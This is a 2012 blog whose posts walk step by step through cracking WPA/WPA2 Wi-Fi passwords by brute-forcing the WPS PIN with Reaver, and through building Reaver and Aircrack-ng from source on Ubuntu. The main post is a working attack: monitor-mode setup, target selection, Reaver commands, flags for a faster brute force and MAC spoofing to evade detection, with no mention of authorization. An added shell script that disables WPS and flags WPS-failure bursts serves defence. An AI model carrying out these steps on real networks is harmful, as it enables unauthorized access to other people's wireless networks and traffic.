Saturday, December 29, 2012

How to Crack a Wi-Fi Network’s WPA Password with Reaver

A new, free, open-source tool called Reaver exploits a security hole in wireless routers and can crack most routers' current passwords with relative ease. Here's how to crack a WPA or WPA2 password, step by step, with Reaver—and how to protect your network against Reaver attacks.

On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.

What You'll Need
#A PC running Linux.
#A computer with a Wi-Fi card.

Run the following commands in the terminal. The # marks the root prompt; type each command without it.

Step 1: Install Airmon-ng Suite from my previous post.

Step 2: Install Reaver from my previous post.

Step 3: To get root privileges, in terminal type:

# sudo -s

Step 4: Find your wireless card. In the terminal type:

# iwconfig

Step 5: Put your wireless card into monitor mode. Assuming your wireless card's interface name is wlan0, execute the following command to put it into monitor mode:

# airmon-ng start wlan0

Step 6: In terminal type:

# airodump-ng mon0

It will display a list of wireless networks in range. When you see the network you want to crack, press Ctrl+C to stop the list from refreshing, then copy that network's BSSID (MAC address of the targeted network). The network should have WPA or WPA2 listed under the ENC column.

Step 7: Now we start cracking the password with Reaver. The general form of the command is:

# reaver -i <monitor interface> -b <BSSID> -vv

For example, if your monitor interface was mon0 like mine, and your BSSID was 7F:AC:6B:MB:1F:B2 (a BSSID I just made up), your command would look like:

# reaver -i mon0 -b 7F:AC:6B:MB:1F:B2 -vv

Now sit back and relax as Reaver tries a series of PINs on the router in a brute force attack. The Reaver documentation says it can take between 4 and 10 hours.

Speeding Up the Attack

By default, Reaver has a 1 second delay between PIN attempts. You can disable this delay by adding '-d 0' on the command line, but some APs may not like it:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0

Another option that can speed up an attack is --dh-small. This option instructs Reaver to use small Diffie-Hellman secret numbers in order to reduce the computational load on the target AP:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small

MAC Spoofing

In some cases you may want or need to spoof your MAC address. Reaver supports MAC spoofing with the --mac option, but you must ensure that you have spoofed your MAC correctly in order for it to work.
Changing the MAC address of the virtual monitor mode interface (typically named mon0) WILL NOT WORK. You must change the MAC address of your wireless card's physical interface. For example:

# ifconfig wlan0 down
# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
# ifconfig wlan0 up
# airmon-ng start wlan0
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69
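
As an added defensive example (not code from the original post), the following POSIX shell script audits a hostapd.conf for WPS being enabled, the feature the PIN brute force above relies on, writes a hardened copy with wps_state=0, and counts WPS failures per client MAC in a log. The hostapd wps_state key is real; the sample config, the sample log and its "STA <mac> WPS-FAIL" line format are constructed, and because Reaver can spoof its MAC (--mac above), per-MAC counts are a detection aid while disabling WPS is the actual fix.

```shell
# Constructed sample hostapd.conf with WPS switched on (the weak setting).
WEAK_CONF=$(mktemp)
cat > "$WEAK_CONF" <<'EOF'
interface=wlan0
ssid=HomeNet
wpa=2
wpa_key_mgmt=WPA-PSK
wps_state=2
eap_server=1
EOF

# Return 0 when the config enables WPS (hostapd wps_state=1 or 2), else 1.
wps_enabled() {
    state=$(grep -E '^[[:space:]]*wps_state=' "$1" | tail -n 1 | cut -d= -f2 | tr -d ' ')
    [ -n "$state" ] && [ "$state" != "0" ]
}

# Write a hardened copy of the config ($1) to $2 with WPS turned off.
harden_wps() {
    if grep -qE '^[[:space:]]*wps_state=' "$1"; then
        sed -E 's/^[[:space:]]*wps_state=.*/wps_state=0/' "$1" > "$2"
    else
        { cat "$1"; echo 'wps_state=0'; } > "$2"
    fi
}

# Constructed log in a hypothetical "STA <mac> WPS-FAIL" format; real hostapd
# output differs, so adapt the grep pattern and field number to your AP's logs.
WPS_LOG=$(mktemp)
cat > "$WPS_LOG" <<'EOF'
wlan0: STA 00:ba:ad:be:ef:69 WPS-FAIL
wlan0: STA 00:ba:ad:be:ef:69 WPS-FAIL
wlan0: STA 00:ba:ad:be:ef:69 WPS-FAIL
wlan0: STA a4:5e:60:11:22:33 WPS-SUCCESS
EOF

# Print "<count> <mac>" for the client MAC with the most WPS failures.
wps_top_failures() {
    grep 'WPS-FAIL' "$1" | awk '{print $3}' | sort | uniq -c | sort -rn \
        | head -n 1 | awk '{print $1, $2}'
}

# Return 0 when the top failure count exceeds the threshold in $2: a burst of
# WPS failures from one client is the signature of a PIN brute force.
wps_failure_burst() {
    count=$(wps_top_failures "$1" | cut -d' ' -f1)
    [ "${count:-0}" -gt "$2" ]
}
```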

If you encounter any problem you can post a comment below or visit the Reaver website.

Friday, November 30, 2012

How to install Reaver on Ubuntu

One of the uses of Ubuntu is that you can crack wireless networks. I recently moved to Ubuntu and found that Reaver was NOT in the repository. So here's a simple guide on how to install Reaver on Ubuntu.

Run the following commands (shown in quotes, typed without the quotes) in the terminal.
Step 1: "sudo -s"

Type your password.
Installing the dependencies and required tools:

Step 2: "sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev"

Now we have the dependencies and required tools. We can download the Reaver source and install it.

Step 3: "wget http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz"

Extracting the tar package:

Step 4: "tar -xzvf reaver-1.4.tar.gz"

Compiling and installing:

Step 5: "cd reaver-1.4"

Step 6: "cd src"


Step 7: "./configure"

Step 8: "make"

Step 9: "sudo make install"

Reaver is now installed and ready to use. But before you get hacking WPA networks, you'll need to install Aircrack-ng. Install it from my previous post, How to install Aircrack-ng on Ubuntu.

Monday, October 15, 2012

How to install Aircrack-ng on Ubuntu 12.04

One of the uses of Ubuntu is that you can crack wireless networks. I recently moved to Ubuntu 12.04 and found that aircrack-ng was NOT in the repository. So here's a simple guide on how to install Aircrack-ng on Ubuntu 12.04.

So we will be compiling aircrack-ng from source. But there are build errors, mostly caused by the -Werror compiler flag in the source's makefile settings, which turns every warning into an error. This is what you need to do to compile aircrack-ng without the pesky errors.

Run the following commands (shown in quotes, typed without the quotes) in the terminal.
Step 1: "sudo -s"
Type your password.

Step 2: "apt-get install build-essential"

Step 3: "sudo apt-get install libssl-dev"

Now that we have installed the dependencies, we move to the next step: downloading the source of Aircrack-ng.

Step 4: "wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz"

Step 5: "tar -zxvf aircrack-ng-1.1.tar.gz"

Step 6: After extracting the archive, there will be a file called common.mak in the directory downloads/aircrack-ng-1.1. Use your favorite editor to open the file and scroll down until you see the following line:
CFLAGS ?= -g -W -Wall -Werror -O3
Delete the -Werror flag, so that the line now looks like the following:

CFLAGS ?= -g -W -Wall -O3
Save and exit.

Step 7: Copy the whole aircrack-ng-1.1 folder and paste it in the Home Directory.
Step 8: "cd aircrack-ng-1.1"

Step 9: "make"

Step 10: "make install"

Your Aircrack-ng is up and running. Now you may want to install Reaver to get things crackin'.